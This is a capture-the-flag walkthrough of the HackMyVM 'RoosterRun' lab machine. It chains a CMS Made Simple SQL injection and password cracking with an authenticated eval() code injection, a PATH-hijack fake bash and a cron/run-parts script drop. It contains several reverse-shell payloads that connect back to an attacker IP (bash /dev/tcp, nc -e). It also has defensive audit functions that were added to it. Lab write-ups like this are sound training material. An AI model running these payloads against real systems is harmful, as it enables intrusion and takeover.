HMV RoosterRun
Todd

Information Gathering

IP=192.168.0.205
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 00:25 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.0.205
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Port 80 is open. Opening the page shows the site runs CMS Made Simple version 2.2.9.1; let's see whether it has any known vulnerabilities.

Attempting Exploitation

# searchsploit CMS Made Simple
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Executio | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilit | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forg | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authentica | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Up | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Uploa | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary F | php/webapps/46546.py
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) | php/webapps/51600.txt
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template I | php/webapps/51599.txt
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) | php/webapps/51601.txt

For version 2.2.9.1 and above there are several RCEs, but they are all Authenticated, so let's try the SQL injection first.

searchsploit -p 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
Codes: CVE-2019-9053
Verified: False
File Type: Python script, ASCII text executable

Looking at the script, it is Python 2. Running it directly threw errors, and Python 2 does not even have pip; after installing pip2, installing the missing packages failed again. Unbelievable.
But before setting out to port it myself, I found a Python 3 version on GitHub: https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3

python csm_made_simple_injection.py -u http://192.168.0.205/ -c -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 1a0112229fbd699d
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: 4f943036486b9ad48890b2efbf7735a8
[+] Password cracked: homeandaway

With the username and password in hand, the next step is RCE.

searchsploit -p 49345
Exploit: CMS Made Simple 2.2.15 - RCE (Authenticated)
URL: https://www.exploit-db.com/exploits/49345
Path: /usr/share/exploitdb/exploits/php/webapps/49345.txt
Codes: N/A
Verified: False
File Type: ASCII text

└─# cat /usr/share/exploitdb/exploits/php/webapps/49345.txt
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

So it looks like: after logging in, add code under Extensions->User Defined Tags, then run it to get the reverse shell.
I found the corresponding User Defined Tags page, adjusted the contents of the exec call, saved it in the Code field, and once it had saved successfully clicked RUN; the shell came back.

pwncat-cs   -lp 1234
received connection from 192.168.0.205:54442
(remote) www-data@rooSter-Run:/var/www/html/admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We now have www-data privileges.

Privilege Escalation to User

Gathering Information

(remote) www-data@rooSter-Run:/var/www/html/admin$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
mysql:x:103:112:MySQL Server,,,:/nonexistent:/bin/false
matthieu:x:1000:1000:,,,:/home/matthieu:/bin/zsh


(remote) www-data@rooSter-Run:/var/www/html/admin$ cd /home/matthieu/
(remote) www-data@rooSter-Run:/home/matthieu$ ls -al
total 40
drwxr-xr-x 4 matthieu matthieu 4096 Sep 14 06:20 .
drwxr-xr-x 3 root root 4096 Sep 24 2023 ..
lrwxrwxrwx 1 root root 9 Sep 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 matthieu matthieu 220 Sep 22 2023 .bash_logout
-rw-r--r-- 1 matthieu matthieu 3526 Sep 22 2023 .bashrc
drwxr-xr-x 3 matthieu matthieu 4096 Sep 22 2023 .local
drwxr-xr-x 12 matthieu matthieu 4096 Sep 22 2023 .oh-my-zsh
-rw-r--r-- 1 matthieu matthieu 807 Sep 22 2023 .profile
-rw-r--r-- 1 matthieu matthieu 3915 Sep 22 2023 .zshrc
-rwxr-xr-x 1 matthieu matthieu 302 Sep 23 2023 StaleFinder
-rwx------ 1 matthieu matthieu 33 Sep 24 2023 user.txt

(remote) www-data@rooSter-Run:/home/matthieu$ cat StaleFinder
#!/usr/bin/env bash

for file in ~/*; do
    if [[ -f $file ]]; then
        if [[ ! -s $file ]]; then
            echo "$file is empty."
        fi

        if [[ $(find "$file" -mtime +365 -print) ]]; then
            echo "$file hasn't been modified for over a year."
        fi
    fi
done

Found a curious script that does not seem to do anything useful. But the shebang on the first line is a bit odd: I usually write #!/bin/bash. I asked GPT, which said that with #!/usr/bin/env bash the system looks up the bash interpreter through env, and that it is written this way for portability across systems.
So if I hijack the bash that env finds, I can run my own code?

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

(remote) www-data@rooSter-Run:/home/matthieu$ which bash
/usr/bin/bash

(remote) www-data@rooSter-Run:/home/matthieu$ ls -al /usr/local/bin/
total 8
drwxrwx---+ 2 root root 4096 Sep 24 2023 .
drwxr-xr-x 10 root root 4096 Jun 15 2023 ..

See that odd + sign? I remember that indicates an ACL. Does this mean a path has been left open for me to write a bash in there??
But just as I was about to do it, a problem occurred to me: right now I am www-data; if I hijack it and it runs, what good does that do me... Stuck for the moment.

Let's look at other information and see whether I missed something. I pulled over pspy64 and waited until the 55-second mark to run it.

wget 192.168.0.30:8000/pspy64
chmod +x pspy64
./pspy64

2024/09/14 09:59:38 CMD: UID=0 PID=1 | /sbin/init
2024/09/14 10:00:01 CMD: UID=0 PID=3874 | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0 PID=3873 | /usr/sbin/cron -f
2024/09/14 10:00:01 CMD: UID=0 PID=3875 | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0 PID=3876 | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0 PID=3877 | /bin/sh -c /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=1000 PID=3878 | /bin/sh -c /home/matthieu/StaleFinder
2024/09/14 10:00:01 CMD: UID=0 PID=3879 | /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=0 PID=3880 | /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=1000 PID=3881 | bash /home/matthieu/StaleFinder
2024/09/14 10:00:01 CMD: UID=1000 PID=3882 | bash /home/matthieu/StaleFinder

User 1000, i.e. matthieu, runs StaleFinder with bash. We saw the PATH just now: /usr/local/bin/ comes first, so we can write our own bash, drop it in /usr/local/bin/, and wait for it to be executed.
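As an added defender-side check (my code, not from the original writeup or the box), the following shell functions reproduce the lookup that bit this host: which PATH entries sit before the directory really providing an interpreter and are writable by the current user, and which scripts rely on an env-style shebang and so resolve their interpreter through PATH. The directory layout in the demo is constructed in a temp dir and stands in for /usr/local/bin and /usr/bin.

```shell
# Added audit helper, not part of the original writeup. It lists the PATH
# entries that come BEFORE the directory really providing an interpreter and
# that the current user can write to: the places from which a script starting
# with "#!/usr/bin/env bash" can be made to run a different bash.

# Print the first PATH entry in $1 that holds an executable named $2.
resolve_in_path() {
    local path="$1" name="$2" dir
    local IFS=':'
    for dir in $path; do
        [ -x "$dir/$name" ] && { printf '%s\n' "$dir"; return 0; }
    done
    return 1
}

# Print PATH entries that precede the resolving directory and are writable by
# us. test -w asks the kernel via access(2), so ACL grants (the "+" shown by
# ls -l) count just like plain mode bits.
shadowing_writable_dirs() {
    local path="$1" name="$2" real dir
    real=$(resolve_in_path "$path" "$name") || return 1
    local IFS=':'
    for dir in $path; do
        [ "$dir" = "$real" ] && break
        [ -d "$dir" ] && [ -w "$dir" ] && printf '%s\n' "$dir"
    done
    return 0
}

# Print scripts in directory $1 whose first line is an env-style shebang; only
# those resolve their interpreter through PATH and are exposed to the above.
env_shebang_scripts() {
    local dir="$1" f
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        head -n 1 "$f" | grep -q '^#!/usr/bin/env ' && printf '%s\n' "$f"
    done
    return 0
}

# Constructed demo layout under a temp dir, standing in for the real filesystem.
demo() {
    local root; root=$(mktemp -d)
    mkdir -p "$root/local/bin" "$root/usr/bin"
    printf '#!/bin/sh\n' > "$root/usr/bin/bash"; chmod 0755 "$root/usr/bin/bash"
    printf '#!/usr/bin/env bash\n' > "$root/StaleFinder"
    shadowing_writable_dirs "$root/local/bin:$root/usr/bin" bash  # prints $root/local/bin
    env_shebang_scripts "$root"                                   # prints $root/StaleFinder
    rm -rf "$root"
}
```

Run `shadowing_writable_dirs "$PATH" bash` on a real host to get the list of directories that need their write bits or ACLs reviewed.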

echo 'nc -e /bin/bash 192.168.0.30 4567' > /usr/local/bin/bash
chmod +x /usr/local/bin/bash

Listen on port 4567 locally and wait for it to run.

pwncat-cs   -lp 4567

(remote) matthieu@rooSter-Run:/home/matthieu$ id
uid=1000(matthieu) gid=1000(matthieu) groups=1000(matthieu),100(users)

Privilege Escalation to Root

With the user shell obtained, I thought back to the UID=0 entries in the cron jobs we saw earlier; let's see whether any of them can be leveraged:

(remote) matthieu@rooSter-Run:/home/matthieu$ cat /opt/maintenance/backup.sh
#!/bin/bash

PROD="/opt/maintenance/prod-tasks"
PREPROD="/opt/maintenance/pre-prod-tasks"


for file in "$PREPROD"/*; do
    if [[ -f $file && "${file##*.}" = "sh" ]]; then
        cp "$file" "$PROD"
    else
        rm -f ${file}
    fi
done

for file in "$PROD"/*; do
    if [[ -f $file && ! -O $file ]]; then
        rm ${file}
    fi
done

/usr/bin/run-parts /opt/maintenance/prod-tasks

This time the shebang is normal. Looking at the script, file##*. is bash string trimming; "${file##*.}" should extract the file's extension.
The script appears to copy files back and forth, delete files, and finally run /usr/bin/run-parts /opt/maintenance/prod-tasks.

run-parts executes all the scripts in a directory.
Doesn't that look easy? I just write a script under /opt/maintenance/pre-prod-tasks and wait for it to run, right?

echo '/usr/bin/nc -e /bin/bash 192.168.0.30 7890' > /opt/maintenance/pre-prod-tasks/a.sh
chmod +x /opt/maintenance/pre-prod-tasks/a.sh

After waiting a while, the script had been copied to /opt/maintenance/prod-tasks, but the reverse shell showed no sign of life. Let's take a look at run-parts.

╰─$ /usr/bin/run-parts -h

Usage: run-parts [OPTION]... DIRECTORY
--test print script names which would run, but don't run them.
--list print names of all valid files (can not be used with
--test)
-v, --verbose print script names before running them.
-d, --debug print script names while checking them.
--report print script names if they produce output.
--reverse reverse execution order of scripts.
--exit-on-error exit as soon as a script returns with a non-zero exit
code.
--stdin multiplex stdin to scripts being run, using temporary file
--lsbsysinit validate filenames based on LSB sysinit specs.
--new-session run each script in a separate process session
--regex=PATTERN validate filenames based on POSIX ERE pattern PATTERN.
-u, --umask=UMASK sets umask to UMASK (octal), default is 022.
-a, --arg=ARGUMENT pass ARGUMENT to scripts, use once for each argument.
-V, --version output version information and exit.
-h, --help display this help and exit.

Not much information there; let's check the man page:

RUN-PARTS(8)                                                                    System Manager's Manual                                                                   RUN-PARTS(8)

NAME
run-parts - run scripts or programs in a directory

SYNOPSIS
run-parts [--test] [--verbose] [--debug] [--report] [--lsbsysinit] [--regex=RE] [--umask=umask] [--arg=argument] [--exit-on-error] [--help] [--version] [--list] [--reverse]
[--] DIRECTORY

run-parts -V

DESCRIPTION
run-parts runs all the executable files named within constraints described below, found in directory directory. Other files and directories are silently ignored.

If neither the --lsbsysinit option nor the --regex option is given then the names must consist entirely of ASCII upper- and lower-case letters, ASCII digits, ASCII underscores, and ASCII minus-hyphens.

If the --lsbsysinit option is given, then the names must not end in .dpkg-old or .dpkg-dist or .dpkg-new or .dpkg-tmp, and must belong to one or more of the following namespaces: the LANANA-assigned namespace (^[a-z0-9]+$); the LSB hierarchical and reserved namespaces (^_?([a-z0-9_.]+-)+[a-z0-9]+$); and the Debian cron script namespace (^[a-zA-Z0-9_-]+$).

If the --regex option is given, the names must match the custom extended regular expression specified as that option's argument.

Files are run sequentially in the lexical sort order (according to the C/POSIX locale character collation rules) of their names unless the --reverse option is given, in which case they are run in the opposite order.

When no options are given, the file names must consist entirely of ASCII upper- and lower-case letters, ASCII digits, ASCII underscores and ASCII hyphens. Put that together with the if [[ -f $file && "${file##*.}" = "sh" ]] in the script earlier, and I suddenly realised: surely this thing can't have a .sh suffix?
Because .sh breaks that rule. So let me rename it?

(remote) matthieu@rooSter-Run:/opt/maintenance/prod-tasks$ mv a.sh a

Waited a while longer; the shell still did not come back. After being stuck for a long time I read 小白's writeup and found that a shebang is needed here, so I changed it again:
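To make the two failures above concrete, here is an added review helper (my code, not from the writeup or the box) that reproduces the three gates a file has to pass before the root cron job would execute it: backup.sh's "${file##*.}" = "sh" filter, the default run-parts name rule from the man page, and run-parts' direct exec, which needs an interpreter line. Walking a cron chain like this shows that the first two gates are mutually exclusive, so nothing backup.sh copies into prod-tasks can ever run.

```shell
# Added review helper, not part of the original writeup. It reproduces the
# gates a file must pass before the root cron job above would execute it,
# and makes the mismatch between them visible.

# Gate 1, from backup.sh: "${file##*.}" strips everything up to and including
# the last dot, so only names whose suffix is "sh" survive the pre-prod loop
# (a name with no dot yields the whole name, which never equals "sh" unless
# the file is literally called "sh").
backup_keeps() {
    local file="$1"
    [ "${file##*.}" = "sh" ]
}

# Gate 2, run-parts with neither --lsbsysinit nor --regex: the name must be
# only ASCII letters, digits, underscore and hyphen. A dot fails it, so every
# name that passes gate 1 fails gate 2.
run_parts_default_ok() {
    printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9_-]+$'
}

# Gate 3: run-parts execs each file directly rather than through a shell, so
# a text file without a "#!" interpreter line is not run (the reason the
# rename alone did not work).
has_shebang() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = "#!" ]
}

# Summarise what happens to a file dropped into pre-prod-tasks with this name.
classify_name() {
    if backup_keeps "$1"; then
        echo "copied to prod-tasks but never run"   # dot blocks run-parts
    elif run_parts_default_ok "$1"; then
        echo "deleted from pre-prod; would run only if placed in prod-tasks directly"
    else
        echo "deleted from pre-prod; run-parts would ignore it anyway"
    fi
}

# Full verdict for a real file: name rule plus interpreter line.
would_run_parts_execute() {
    local path="$1"
    run_parts_default_ok "$(basename "$path")" && has_shebang "$path"
}
```

A maintainer auditing this job would either make backup.sh copy dot-free names or pass run-parts a --regex that admits .sh, since as written the pipeline silently runs nothing.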

echo '#!/bin/bash' > /opt/maintenance/pre-prod-tasks/a.sh
echo 'nc -e /bin/bash 192.168.0.30 7890' >> /opt/maintenance/pre-prod-tasks/a.sh
chmod +x /opt/maintenance/pre-prod-tasks/a.sh
# once the file has been copied to prod-tasks, rename it
mv a.sh a

Wow, it finally worked this time.

(remote) root@rooSter-Run:/root# id
uid=0(root) gid=0(root) groups=0(root)

Celebration!
